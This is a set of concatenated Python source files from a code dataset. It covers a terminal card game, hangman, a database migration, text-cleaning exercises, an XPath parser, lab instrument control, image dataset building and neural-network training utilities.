play (type ) (see Rules of the Capitalista)\n And the output variables:\n :return id: Index of the player that will play after this play (type )\n '''\n num_players = len(players_on_round)\n id = id_player_ant + increment\n id = id % num_players\n\n found = False\n\n while found == False:\n if players_on_round[id] == 0:\n found = True\n else:\n id = id + 1\n id = id % num_players\n\n return id\n\n\ndef next_play(players_hand, card_table, players_on_round, first_play=False, id_player=0):\n '''\n The function next_play computes the play of a player, by showing their hand and asking about their next decision.\n It receives the following input variables:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param card_table: Card on the table that the player must overcome (type Card)\n :param players_on_round: Vector with a boolean of the players still playing on 
this round (type )\n :param first_play: Bool that indicates that the game is starting (type )\n :param id_player: Index indicating the player that will play (type )\n And the output variables:\n :return: a vector with:\n - id_player: Index indicating the player that will play the next play (type )\n - card_selected: Card selected by the player (type Card)\n - player_continue: Bool that indicates if the player will continue playing in this round (type )\n '''\n num_players_finished = 0\n num_players = len(players_hand)\n\n if first_play == True:\n [id, card_to_play] = search_card(players_hand, card_table)\n show_cards_to_players(players_hand)\n\n print(' ====> ', players_hand[id].name, ' played ', card_to_play)\n\n print('--------------------------------------------------')\n print(' - Card in the Table: ', card_table)\n\n card_table = card_to_play\n\n players_hand[id].remove_card(card_to_play)\n id_player = id + 1;\n id_player = id_player % num_players\n\n return [id_player, card_table, True]\n\n else:\n\n [value, card_selected] = card_election(players_hand, card_table, id_player)\n\n if value == 0:\n players_hand[id_player].remove_card(card_selected)\n id_player = next_player(players_on_round, id_player, 2)\n player_continue = True\n elif value == 1:\n players_hand[id_player].remove_card(card_selected)\n id_player = next_player(players_on_round, id_player, 1)\n player_continue = True\n else: # value = -1\n players_on_round[id_player] = 1\n id_player = next_player(players_on_round, id_player, 1)\n player_continue = False\n\n return [id_player, card_selected, player_continue]\n\n\ndef show_cards_to_players(players_hand):\n '''\n The show_cards_to_players prints the cards of the players and how many they have left.\n It receives the following input variables:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n It doesn't have an output variable.\n '''\n for i in range(len(players_hand)):\n cards_left = 
len(players_hand[i].cards)\n print(players_hand[i].name + ' - Left: ', cards_left)\n print(players_hand[i])\n\n\ndef search_card (players_hand, card_to_search, id=0):\n '''\n The search_card function searches for a card between the hands of the players.\n It receives the following input variables:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param card_to_search [suit number] Card we are looking for (type )\n :param id: Index of the player (if we know which player is the holder) (type )\n And the output variables:\n :return: a vector with:\n - i : Index of the player owning the card we were looking for) (type )\n - card : the card we were looking for (type Card)\n '''\n if id == 0:\n for i in range(len(players_hand)):\n for card in players_hand[i].cards:\n if card_to_search.number == card.number and card_to_search.suit == card.suit:\n return [i, card]\n break\n else:\n for card in players_hand[id].cards:\n if card_to_search.number == card.number and card_to_search.suit == card.suit:\n return [id, card]\n break\n\n\ndef check_finish(players_hand, num_players_finished):\n '''\n The function check_finish checks if a player has no cards left in their hand.\n The input variables are:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param num_players_finished: Number of players that have finished the game\n And the output:\n :return num_players_finished: Number of players that have finished the game updated\n \n '''\n for hand in players_hand:\n if hand.is_empty() == 0:\n num_players_finished = num_players_finished + 1\n if num_players_finished == 1:\n print('\\n \\n THE WINNER IS', hand.name)\n\n return [num_players_finished]\n\n\ndef capitalista():\n '''\n This is the main function of the game of cards : Capitalista. 
The game is played if a Spanish deck.\n Spanish deck is formed by four suits: Oro, Espada, Bastos and Copa; and numbers are from 1 to 12.\n The whole game is run using the terminal.\n The rules of the game are the following:\n - Numbers ordered from smaller to bigger:\n 3 - 4 - 5 - 6 - 7 - 8 - 9 - 10 - 11 - 12 - 1 - 2\n - In order to start the game, the player with the 3 of Oro starts the game.\n - After a 7, the following player must play a 7 or/and 8\n - After a 10, the following player must play a card with a score below or equal to 10.\n - The highest car is 2. And the card that works in every situation is the 2 of Oro.\n - If a player sets the same number of a card as the one in the table, the following player will be skipped but they will continue playing in this round\n - If a player cannot play or does not want to play, the player will no longer be playing in this round\n - A round is ended when only one player is playing. After a round ends all players (with cards left) will be playing again.\n :return:\n '''\n\n card_start = Card(0, 3)\n players_hand = start_game(Deck, Hand)\n\n print(' - The hands of each player are:')\n players_out_round = []\n for i in range(0, len(players_hand)):\n players_out_round.append(0)\n\n [id_player, card_table, player_continue] = next_play(players_hand, card_start, players_out_round , True)\n\n num_players_finished = 0\n num_plays = 0\n num_players_out_round = 0\n\n while num_players_finished != len(players_hand):\n if num_players_out_round != len(players_hand)-1:\n [id_new, card_table, player_continue] = next_play(players_hand, card_table, players_out_round, False, id_player)\n if player_continue == False:\n players_out_round[id_player] = 1\n num_players_out_round = num_players_out_round + 1\n id_player = id_new\n else:\n for i in range(0, len(players_hand)):\n players_out_round[i] = 0\n print('\\n NEW ROUND: ')\n [id_new, card_table, player_continue] = next_play(players_hand, '', players_out_round, False)\n num_plays = 
num_plays + 1\n\n [num_players_finished] = check_finish(players_hand, num_players_finished)\n\n\nif __name__ == '__main__':\n capitalista()\n\n\n","sub_path":"Python/Capitalista_Card_Game/capitalista_main.py","file_name":"capitalista_main.py","file_ext":"py","file_size_in_byte":15985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247915451","text":"import random\nimport os\nfrom time import sleep \n \ndef clear(): \n # for windows \n if os.name == 'nt': \n _ = os.system('cls') \n \n # for mac and linux(here, os.name is 'posix') \n else: \n _ = os.system('clear') \n\ndef word_status(word, letters):\n outputString = \"\"\n for letter in word:\n if letter in letters:\n outputString += letter\n else:\n outputString += \"_\"\n\n outputString += \" \"\n \n return outputString\n\n\ndef letter_status(letters):\n outputString = \"\"\n for letter in letters:\n outputString += letter + \" \"\n return outputString\n\n\ndef word_guessed(word, letters):\n return all(x in letters for x in word)\n\n########################################################\n###################### WORD LIST #######################\n\n# Initialize the word list\nwords = []\n\n# Load words from file\nwith open(\"Hangman/hangman_words.txt\", \"r\") as wordFile:\n for line in wordFile:\n words.append(line.strip())\n\n########################################################\n###################### VARIABLES #######################\n\n# The maximum number of guesses\nguesses = 9\n# The numbers of guesses currently used\nguessesUsed = 0\n# The letters the user already guessed\nlettersGuessed = []\n# The word the user needs to guess\nword = random.choice(words)\ndel words\n\n########################################################\n####################### PROGRAM ########################\n\nwhile guessesUsed < guesses:\n clear()\n print(letter_status(lettersGuessed))\n print(word_status(word, lettersGuessed))\n char = input(\"enter a character: 
\")\n\n if len(char) != 1 or not char.isalpha():\n print(\"Not a character\")\n continue\n\n char = char.lower()\n\n if char not in lettersGuessed:\n lettersGuessed.append(char)\n guessesUsed += 1\n else:\n print (\"character already guessed.. please enter a character you haven't already guessed\")\n continue\n\n if (word_guessed(word, lettersGuessed)):\n break\n\nif (word_guessed(word, lettersGuessed)):\n clear()\n print(word_status(word, lettersGuessed))\n print(\"Correct!\")","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"170965573","text":"\"\"\"empty message\n\nRevision ID: d67f8c46e34e\nRevises: e12b78b48315\nCreate Date: 2019-12-04 20:37:26.876328\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd67f8c46e34e'\ndown_revision = 'e12b78b48315'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n # op.add_column('users', sa.Column('profile_image', sa.String(), nullable=False))\n with op.batch_alter_table('users') as batch_op:\n batch_op.drop_column('profile_img')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('users', sa.Column('profile_img', sa.VARCHAR(), nullable=False))\n op.drop_column('users', 'profile_image')\n # ### end Alembic commands ###\n","sub_path":"build_along/blog-project/migrations/versions/d67f8c46e34e_.py","file_name":"d67f8c46e34e_.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"885833","text":"import string\nimport re\n\n\ndef scrub_numbers(input: str) -> str:\n return re.sub(r\"\\d\", \"\", input)\n\n\ndef gentle_clean(input: str) -> str:\n input = re.sub(r\"[-_]\", \" \", input)\n return input.replace(\" \", \" \")\n\n\ndef clean_data(input: str) -> str:\n return gentle_clean(scrub_numbers(input)).strip()\n\n\ndef some_scrubber(input: str) -> str:\n return re.sub(r\"(?<=[\\w\\.]) \", \"\", input).replace(\" \", \" \")\n\n\ndef mr_clean(input: str) -> str:\n return re.sub(r\"(?<=[\\w ])\", \" \", input).replace(\" \", \" \")\n\n\ndef ms_clean(input: str) -> str:\n input = input.split(\" \")\n out = []\n for s in input:\n out.append(f\"{s[0]}{len(s) - 2}{s[len(s) - 1]}\")\n return \" \".join(out)\n\n\ndef strong_cleaner(input: str) -> str:\n c = input[0]\n return c + re.sub(r\"[!@#$%^&*()\\dA-Z]\", \"\", input)\n\n\ndef extracto(input):\n total = 0\n for n in string.digits:\n total += int(n) * input.count(n)\n return total\n\n\nprint(scrub_numbers('Be9autiful9 i4s be2tter th4an ug42ly'))\nprint(gentle_clean('Explicit_is-better_than -implicit'))\nprint(clean_data(' 42Simple-is_better_than-compl9ex '))\nprint(some_scrubber('F l a t i s b e t t e r t h a n n e s t e d . 
'))\nprint(mr_clean('Sparse is better than dense'))\nprint(ms_clean('Readability counts'))\nprint(strong_cleaner('Err@#%$ors sho@#$@#$uld nev1!$#@er pass sile&I&&*(ntly'))\nprint(extracto('1S2pe3cia4l ca5ses ar6en\\'t \\\nsp7ecial en8ough to b9reak the r0ules.'))\nprint(extracto('2S4pe6cia8l ca0ses ar2en\\'t \\\nsp4ecial en6ough to b8reak the r0ules.'))\nprint(extracto('3S6pe9cia2l ca5ses ar8en\\'t \\\nsp1ecial en4ough to b7reak the r0ules.'))\n","sub_path":"python/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152207980","text":"#\n# Copyright (c), 2018-2020, SISSA (International School for Advanced Studies).\n# All rights reserved.\n# This file is distributed under the terms of the MIT License.\n# See the file 'LICENSE' in the root directory of the present\n# distribution, or http://opensource.org/licenses/MIT.\n#\n# @author Davide Brunato \n#\n\"\"\"\nXPath 3.1 implementation\n\"\"\"\nfrom ..namespaces import XPATH_MAP_FUNCTIONS_NAMESPACE, \\\n XPATH_ARRAY_FUNCTIONS_NAMESPACE # , XSLT_XQUERY_SERIALIZATION_NAMESPACE\nfrom ..xpath30 import XPath30Parser\n\n\nclass XPath31Parser(XPath30Parser):\n \"\"\"\n XPath 3.1 expression parser class.\n \"\"\"\n version = '3.1'\n\n SYMBOLS = XPath30Parser.SYMBOLS | set()\n \"\"\"\n {\n 'format-number', 'random-number-generator', 'collation-key',\n 'contains-token', 'parse-ietf-date',\n\n # Higher-order functions\n 'sort', 'apply', 'load-xquery-module', 'transform',\n\n # Maps and Arrays\n 'merge', 'size', 'keys', 'contains', 'get', 'find', 'put', 'entry',\n 'remove', 'append', 'subarray', 'remove', 'join', 'flatten',\n\n # Functions on JSON Data\n 'parse-json', 'json-doc', 'json-to-xml', 'xml-to-json',\n }\n \"\"\"\n\n DEFAULT_NAMESPACES = {\n 'map': XPATH_MAP_FUNCTIONS_NAMESPACE,\n 'array': XPATH_ARRAY_FUNCTIONS_NAMESPACE,\n **XPath30Parser.DEFAULT_NAMESPACES\n }\n\n\n##\n# XPath 3.0 
definitions\nregister = XPath31Parser.register\nunregister = XPath31Parser.unregister\nliteral = XPath31Parser.literal\nprefix = XPath31Parser.prefix\ninfix = XPath31Parser.infix\ninfixr = XPath31Parser.infixr\nmethod = XPath31Parser.method\nfunction = XPath31Parser.function\n\nXPath31Parser.build()\n","sub_path":"flaskProject/venv/Lib/site-packages/elementpath/xpath31/xpath31_parser.py","file_name":"xpath31_parser.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"125614562","text":"# -*- coding: utf-8 -*-\n\"\"\"\nOnOffDTG.py でDTGを動かすこと!\nCW ODMR は meow とぶつかるので、立ち上げずに、DTGのみこれでON OFFする\n\n\n- npz保存\n- binary 読み出し\n\n\nBy Yuta Masuyama\nCode to measure ozawa sample.\n\nCreated on Mon May 15 12:08:50 2017\n\n@author: NV\n\"\"\"\nimport modu_inst as ist\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport visa\nimport os \n\nimport modu_htn as htn\nhtn.setFigParam()\n#######################################################################\n\n#mwpows = np.arange(-50, 1, 5)\nmwpows = [0.]\nfreq_ini = 1.0\nfreq_fin = 3.0\nfreq_step = 0.01\n\nwaitTime = 0.3# average の待ち時間\ntimeDiv = 500*10**-12#sec/div\nsample_sec = 20*10**9#sample / sec\nchannels =['C1'] \n\n\nmwSweep = np.arange(freq_ini, freq_fin, freq_step)*10**9\n#######################################################################\nparaDict = {'mwpows':mwpows, 'freq_ini':freq_ini, 'freq_fin':freq_fin, \n 'freq_step':freq_step, 'waitTime':waitTime, \n }\n\ndirectly = ist.makeResultDir()\n\nist.saveDict2Json(paraDict, name='parameter.jso', directry=directly)\n\n###############################################################################\nimport win32com.client #import the pywin32 library\nscope=win32com.client.Dispatch(\"LeCroy.ActiveDSOCtrl.1\") #creates instance of the ActiveDSO control\nscope.MakeConnection('IP:LCRY2803N55897')#Connects to the oscilloscope. 
Substitute your IP address\n\n#scope.WriteString(\"*RST\", True)#デバイスをリセット\n\n### 640ZiSetting ###\nscope.WriteString(\"INSPECT? WAVEDESC\", True)#my_instrument.query(\"INSPECT? WAVEDESC\")\nWAVEDESC = scope.ReadString(5000)#reads a maximum of 80 bytes\nwith open(os.path.join(directly,'640ZiSetting.txt'), 'w') as f:\n f.write(WAVEDESC)\n#memorySize = 100*10**3\n#scope.WriteString(\"MSIZ {}\".format(memorySize), True)\ntime.sleep(0.1) \n \n\nplt.close('all')\n\n### SG #########################################################################\n\nrm = visa.ResourceManager()\nprint(rm.list_resources())\n#class N5182B_S3(N5182B):\n# def __init__(self, power_bounds=(-140.0, 19.0), freq_bounds=(9.0E3, 6.0E9)):\n# N5182B.__init__(self, 'GPIB0::2', power_bounds, freq_bounds)\n\n#SG_N5182B = ist.N5182B('GPIB0::2',power_bounds=(-110.0, 9.0), freq_bounds=(9.0E3, 3.0E9)) #EEI\nSG_N5182B = ist.N5182B('GPIB0::2',power_bounds=(-140.0, 19.0), freq_bounds=(9.0E3, 6.0E9)) #S3\nSG_N5182B.output(False)\n\n\ndef plotSpectrum(timeArray, mwfreqs,volts):\n plt.figure(1, figsize = htn.calcFigSize(column =1, h_ratio= 0.7))\n plt.savefig(os.path.join(directly,str(mw_pow) +'dBm_Waveform.png'), dpi = 300)#transparent=True)\n \n plt.figure(figsize = htn.calcFigSize(column =1, h_ratio= 0.7))\n plt.plot(mwfreqs,volts)\n plt.savefig(os.path.join(directly,str(mw_pow) +'dBm_MWspec.png'), dpi = 300)#transparent=True)\n np.savetxt(os.path.join(directly,str(mw_pow) +'dBm_MWspec_volts.csv'), volts,delimiter=\",\")\n np.savetxt(os.path.join(directly,str(mw_pow) +'dBm_MWspec_mwfreqs.csv'), mwfreqs,delimiter=\",\")\n\n\n## ittan ###\n\n#my_instrument.write(\"DISPLAY OFF\")#ディスプレイの更新を止める.\nDEFAULT_BUFFER_SIZE = 80#出力文字サイズ\ncolors = ['b', 'g', 'r', 'm']\ntry:\n ### get memorySize ###\n assert scope.WriteString(\"MSIZ?\", True), 'MSIZ? 
--> can not communicate with 640Zi'\n value = scope.ReadString(DEFAULT_BUFFER_SIZE)\n memorySize = int(float(value))\n\n for j in range(len(mwpows)):\n mw_pow = mwpows[j]\n plt.close('all')\n mwfreqs =[]\n amps0 = []\n for i in range(len(mwSweep)):\n \n #リセットと確認\n scope.WriteString(\"C1:CLEAR_SWEEPS\", True)#積算のリセット\n scope.WriteString(\"*OPC?\", True)\n OPC = scope.ReadString(DEFAULT_BUFFER_SIZE)\n while OPC ==False:\n scope.WriteString(\"*OPC?\", True)\n OPC = scope.ReadString(DEFAULT_BUFFER_SIZE)\n print('*OPC? = 0')\n time.sleep(0.2) \n \n #mw_pow =\n mw_freq =mwSweep[i]\n filename= 'MW'+str(mw_pow) +'dBm' + str(mw_freq*10**-9)+'GHz' \n print(filename)\n \n \n ####\n SG_N5182B.setup_CW(mw_freq, mw_pow)\n SG_N5182B.output(True)\n time.sleep(waitTime) # cahnge wait depending on accumulation\n \n\n ### get wave ###\n scope.WriteString(\"COMM_FORMAT DEF9,WORD,BIN\", True)\n \n for i in range(len(channels)):\n ch = channels[i]\n assert scope.WriteString( ch+\":WAVEFORM? DAT1\", True), 'WAVEFORM? 
--> can not communicate with 640Zi'\n timeArray, Waveform = scope.GetScaledWaveformWithTimes(ch, memorySize, 0)#第一引数に転送するトレースの指定、第2 引数に最大バッファサイズ、第3 引数は通常1を指定\n Waveform = np.array(Waveform) \n sampleSize = 10*timeDiv*sample_sec+2\n timeArray = np.arange(sampleSize)/sample_sec\n \n \n ### calc initial val ###\n def myfunc(x, a, b, c, d):\n if b < 0:\n return np.inf\n else:\n return a*np.sin(2 * np.pi * b*x + c) + d \n \n v0= ( (np.max(Waveform) - np.min(Waveform))/2, mw_freq, 0, np.mean(Waveform))\n popt, pcov, SD = htn.data_fit(myfunc, timeArray, Waveform, initial_param1=v0)\n timeArray_fit = np.linspace(min(timeArray), max(timeArray), 500)\n \n \n \n np.savez(os.path.join(directly,filename+ch+'.npz'), tim=timeArray, vol=Waveform)\n \n if i ==0:\n plt.figure(1)\n plt.clf()\n amps0.append( abs(popt[0]))\n mwfreqs.append(mw_freq)\n \n if True:\n plt.figure(1, figsize = htn.calcFigSize(column =1, h_ratio= 0.7))\n plt.title(filename)\n plt.plot(timeArray, Waveform, colors[i]+'o', alpha=0.6)\n plt.plot(timeArray_fit, myfunc(timeArray_fit,*popt), colors[i]+'-')\n if ch==channels[-1]:\n plt.xlabel('Time (s)')\n plt.ylabel('Voltage (V)')\n plt.tight_layout()\n plt.savefig(os.path.join(directly,filename+'_waveform_total.png'), dpi = 300)#transparent=True)\n \n \n \n\n \n plt.figure(2)\n plt.clf()\n plt.plot(np.array(mwfreqs)/10**9, amps0, 'bo-')\n plt.xlim(freq_ini, freq_fin)\n plt.pause(.01)\n \n if len(mwpows)!=1:\n plotSpectrum(timeArray, mwfreqs,amps0)\n \n\n \n \n \n\nexcept KeyboardInterrupt:# Ctrl-C を捕まえた!\n print('interrupted!')\n # プログラムをこの時点で殺すなら sys.exit する\n\n\nfinally:\n SG_N5182B.output(False)\n #my_instrument.write(\"DISPLAY ON\") \n scope.Disconnect() #Disconnects from the oscilloscope\n \n plotSpectrum(timeArray, mwfreqs,amps0) \n plt.show() \n print('Data at '+ 
directly)\n\n\n\n","sub_path":"Tool/20170913_readOscillo_fit_MWsweep.py","file_name":"20170913_readOscillo_fit_MWsweep.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634009661","text":"import time\nfrom binary_search_tree import BSTNode\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nduplicates = [] # Return the list of duplicates in this data structure\n\n# Replace the nested for loops below with your improvements\n# for name_1 in names_1:\n# for name_2 in names_2:\n# if name_1 == name_2:\n# duplicates.append(name_1)\n\n\n# solution using BST \n# first create bst starting with the first name in first list\nbst = BSTNode(names_1[0]) \n\n# insert all of the name except the name which is already the root node\nfor i in range(1,len(names_2)):\n bst.insert(names_1[i])\n\n# loop through the second list and use the bst contains method to find duplicate names\nfor name in names_2:\n if bst.contains(name):\n duplicates.append(name)\n\n# runtime varies slightly each time; example runtimes recorded:\n\n# runtime: 0.11457705497741699 seconds\n# runtime: 0.10380697250366211 seconds\n# runtime: 0.13980579376220703 seconds\n# runtime: 0.11453890800476074 seconds\n# runtime: 0.11601901054382324 seconds\n# runtime: 0.11406302452087402 seconds\n# runtime: 0.12554717063903809 seconds\n# runtime: 0.13164591789245605 seconds\n# runtime: 0.11376214027404785 seconds\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n# ---------- Stretch Goal -----------\n# Python has built-in tools that allow for a very efficient approach to this problem\n# What's the best time you can accomplish? 
Thare are no restrictions on techniques or data\n# structures, but you may not import any additional libraries that you did not write yourself.\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15151176","text":"import os\nfrom pathlib import Path\nimport numpy as np\nimport cv2\nimport dsconf\nimport imgutil\n\ndef Build(imagesDir, datasetsDir):\n\t\"\"\"指定ディレクトリ内の画像ファイルからデータセットを作成する.\n\t# Args:\n\t\timagesDir: 画像ファイルが入ったディレクトリ名.\n\t\tdatasetsDir: 出力先データセットディレクトリ名.\n\t\"\"\"\n\n\t# CycleGAN用���ータセットディレクトリ作成\n\tcgd = os.path.join(datasetsDir, \"cyclegan\")\n\tif not os.path.isdir(cgd):\n\t\tos.mkdir(cgd)\n\n\t# 出力先データセットディレクトリに白バックとそれ以外用ディレクトリ作成\n\tnbd = os.path.join(cgd, \"nb\")\n\tif not os.path.isdir(nbd):\n\t\tos.mkdir(nbd)\n\twbd = os.path.join(cgd, \"wb\")\n\tif not os.path.isdir(wbd):\n\t\tos.mkdir(wbd)\n\n\tmaxSize = max(dsconf.MaxImageSize[0], dsconf.MaxImageSize[1])\n\n\t# 指定ディレクトリ内の画像ファイル一覧取得\n\tp = Path(imagesDir)\n\tpls = []\n\tpls.extend(p.glob(\"*.jpg\"))\n\tpls.extend(p.glob(\"*.png\"))\n\tpls.extend(p.glob(\"*.jpeg\"))\n\timageCount = len(pls)\n\tconvertedCount = 0\n\n\tfor pl in pls:\n\t\tfile = os.path.normpath(os.path.join(imagesDir, pl.name))\n\t\timg = cv2.imread(file, cv2.IMREAD_COLOR)\n\t\tif img is None or img.shape[0] < 128 or img.shape[1] < 128:\n\t\t\timageCount -= 1\n\t\t\tcontinue\n\n\t\t# モノトーンはスキップする\n\t\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV_FULL)\n\t\thsv = hsv.transpose(2, 0, 1)\n\t\tif np.mean(hsv[1]) < 20:\n\t\t\timageCount -= 1\n\t\t\tcontinue\n\n\t\t# イメージを所定のサイズへ縮小\n\t\timg = imgutil.ResizeIfLarger(img, maxSize)\n\n\t\t# 白バックかどうか判定して保存先ディレクトリを分けて保存\n\t\td = wbd if _isWhiteBack(img) else nbd\n\t\tf = os.path.splitext(pl.name)[0]\n\t\tcv2.imwrite(os.path.normpath(os.path.join(d, f + \".png\")), img)\n\n\t\tconvertedCount += 1\n\t\tprint(convertedCount, \"/\", 
imageCount)\n\ndef _isWhiteBack(img):\n\t\"\"\"指定イメージが白バックかどうか判定する\n\t# Args:\n\t\timg: 判定元イメージ\n\t# Returns:\n\t\t白バックなら True.\n\t\"\"\"\n\timg = img.transpose(2, 0, 1)\n\n\t# イメージの淵を取得し、白かどうか判定する\n\tt = img[:, :16, :]\n\tb = img[:, -16:, :]\n\tl = img[:, :, :16]\n\tr = img[:, :, -16:]\n\n\t# 淵の最も暗い部分が指定値より明るければ白バックとする\n\tthreshold = 200\n\tif threshold <= np.min(t) and threshold <= np.min(b) and threshold <= np.min(l) and threshold <= np.min(r):\n\t\treturn True\n\n\t# 淵の平均値が指定値より明るくても白バックとする\n\tthreshold = 230\n\tif threshold <= np.mean(t) and threshold <= np.mean(b) and threshold <= np.mean(l) and threshold <= np.mean(r):\n\t\treturn True\n\n\treturn False\n","sub_path":"CycleGan/dsbuilder.py","file_name":"dsbuilder.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"126586326","text":"import h5py\nimport os\n\nfrom PySide2.QtWidgets import QListWidgetItem\n\nfrom hexrd.ui.ui_loader import UiLoader\n\nclass LoadHDF5Dialog:\n\n def __init__(self, f, saved_path=None, parent=None):\n self.file = f\n self.paths = []\n\n self.get_paths(f)\n\n loader = UiLoader()\n self.ui = loader.load_file('load_hdf5_dialog.ui', parent)\n self.create_list()\n\n def get_paths(self, f):\n img = h5py.File(f, 'r')\n self.file = img\n img.visit(self.add_path)\n\n def add_path(self, name):\n if isinstance(self.file[name], h5py.Dataset):\n self.paths.append(name)\n\n def create_list(self):\n path_list = self.ui.hdf5_paths\n path_list.clear()\n for i in range(len(self.paths)):\n path = QListWidgetItem(self.paths[i], path_list)\n path_list.addItem(path)\n\n def results(self):\n remember = self.ui.remember_path.isChecked()\n\n path_list = self.ui.hdf5_paths.currentItem().text()\n group = os.path.split(path_list)[0]\n dataset = os.path.split(path_list)[1]\n\n return group, dataset, 
remember","sub_path":"hexrd/ui/load_hdf5_dialog.py","file_name":"load_hdf5_dialog.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462266051","text":"import torch\ninput = [3,4,6,5,7,\n 2,4,6,8,2,\n 1,6,7,8,4,\n 9,7,4,6,2,\n 3,7,5,4,1]\n\n# 使用view固定为一个张量B×C×W×H\ninput = torch.Tensor(input).view(1, 1, 5, 5)\n\n# 定义卷积\nconv_layer = torch.nn.Conv2d(1, 1, kernel_size=3, padding=1, bias=False)\n\n# 将一个向量转化为张量赋值给kernel卷积核 \nkernel = torch.Tensor([1,2,3,4,5,6,7,8,9]).view(1, 1, 3, 3)\n\n# 卷积权重的初始化\nconv_layer.weight.data = kernel.data\n\n# 卷积\noutput = conv_layer(input)\nprint(output)\n","sub_path":"class9卷积神经网络基础/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18110572","text":"import csv\nfrom os.path import join\nfrom os import makedirs\n\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nfrom scipy import ndimage\nfrom imageio import imwrite\n\nfrom tf_unet.analyze.cca import cca_img_no_unc as cca_img\nfrom tf_unet.analyze.cca import remove_tiny_les, paint_cca_img, ohe\nfrom tf_unet.utils.np_utils import sigmoid\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n_ALPHA = 0.5\n_MIN_SLICE = 5\n_MAX_SLICE = 59\n\n\nclass CSVCallback:\n def __init__(self, csvfile, examples_per_epoch):\n self.__csvfile = csvfile\n self.__examples_per_epoch = examples_per_epoch\n self.__initialized = False\n\n def __call__(self, epoch, stats):\n if not self.__initialized:\n with open(self.__csvfile, 'w', newline='') as f:\n csvwriter = csv.writer(f, delimiter=',')\n csvwriter.writerow(\n ['epoch', 'examples_seen', 'train_loss', 'train_dice', 'val_loss', 'val_dice', 'tpr', 'ppv'])\n self.__initialized = True\n with open(self.__csvfile, 'a', newline='') as f:\n csvwriter = csv.writer(f, delimiter=',')\n csvwriter.writerow([epoch,\n epoch * 
self.__examples_per_epoch,\n stats['train_loss'],\n stats['train_dice'],\n stats['loss'],\n stats['dice'],\n stats['tpr'],\n stats['ppv']])\n\n\nclass PlotCallback:\n def __init__(self, csvfile, output_path):\n self.__csvfile = csvfile\n self.__out_dir = join(output_path, 'plots')\n makedirs(self.__out_dir, exist_ok=True)\n\n def __call__(self):\n data = np.asarray(pd.read_csv(self.__csvfile, header=None))\n nb_examples = np.asarray(data[1:, 1], np.int32)\n train_loss = np.asarray(data[1:, 2], np.float32)\n train_dice = np.asarray(data[1:, 3], np.float32)\n val_loss = np.asarray(data[1:, 4], np.float32)\n val_dice = np.asarray(data[1:, 5], np.float32)\n tpr = np.asarray(data[1:, 6], np.float32)\n ppv = np.asarray(data[1:, 7], np.float32)\n # fdr = np.asarray(data[1:,7], np.float32)\n # ppv = np.asarray(data[1:,8], np.float32)\n # fpr = np.asarray(data[1:,9], np.float32)\n # fnr = np.asarray(data[1:,10], np.float32)\n # f1_score = np.asarray(data[1:,11], np.float32)\n\n plt.plot(nb_examples, train_loss, '--b.', label='train_loss')\n plt.plot(nb_examples, val_loss, '--g.', label='val_loss')\n plt.ylabel('Loss')\n plt.xlabel('Training Examples Seen')\n plt.legend()\n plt.savefig(join(self.__out_dir, 'loss.png'))\n plt.close()\n\n plt.plot(nb_examples, train_dice, '--b.', label='train_dice')\n plt.plot(nb_examples, val_dice, '--g.', label='val_dice')\n plt.ylabel('DICE Coefficient')\n plt.xlabel('Training Examples Seen')\n plt.legend()\n plt.savefig(join(self.__out_dir, 'dice.png'))\n plt.close()\n\n plt.plot(nb_examples, tpr, '--b.', label='TPR')\n plt.plot(nb_examples, ppv, '--g.', label='PPV')\n plt.ylabel('TPR and PPV')\n plt.xlabel('Training Examples Seen')\n plt.legend()\n plt.savefig(join(self.__out_dir, 'tpr_ppv.png'))\n plt.close()\n\n\nclass ValidationLoss:\n def __init__(self, data_gen, nb_val_samples, cca_thresh, batch_size):\n \"\"\"\n :param data_gen: generator that yields validation data\n :param int nb_val_samples: number of validation samples to yield 
